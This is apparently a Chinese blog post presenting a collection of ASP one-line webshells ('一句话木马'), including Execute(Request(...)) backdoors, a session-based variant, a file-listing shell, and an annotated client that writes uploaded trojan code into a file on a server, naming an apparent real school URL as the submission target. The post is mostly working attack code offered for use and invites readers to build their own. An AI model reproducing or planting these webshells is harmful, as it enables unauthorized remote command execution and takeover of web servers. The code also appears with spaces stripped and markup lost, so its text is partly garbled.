asp常用的一句话木马大全【详细介绍】

<%IfRequest("MH")""ThenExecute(Request("MH"))%>
<%ifrequest("MH")""thensession("MH")=request("MH"):endif:ifsession("MH")""thenexecutesession("MH")%>
executerequest("MH")

Host:




Cmd:

<%
ifrequest("authkey")="pic16f873a"then
szPara=Request.Form("path")
setshell=server.createobject("shell.application")
setdir1=shell.namespace(szPara)
setdiritems=dir1.items
foreachiiiindiritems
response.writeiii.path&"["&iii.size&"]
"
next
endif
%>

Host:




Path:

一句话木马客户端源文件：

里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了

//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理

//这里的value值根据服务端中value而设定
//可以自行修改成相应这里的value值也必须改为p
setlP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法
lP.Open//打开
lP.Type=2//以文本方式
lP.CharSet="gb2312"//字体标准
lP.writetextrequest("joeving")//取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应
lP.SaveToFileserver.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close//关闭对象
setlP=nothing//释放对象
response.redirect"wei.asp"//转向生成的wei.asp和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面

//这段程序的功能：利用插入到数据库文件的这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了
添入生成木马的内容/textarea>


//这段标签是你用来添加木马内容用的

程序的主要框架是

//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
//添加木马内容用的

其实都是些很简单的一些html和asp的知识，大家不妨自己写个自己的木马客户端~~~哈哈

ok，今天我就说到这里了，不管如何，只要能帮助到大家，证明这篇文章整理的就有价值了哈，认真、仔细阅读完asp常用的一句话木马大全【详细介绍】，对自己有帮助，麻烦记得点个赞哦！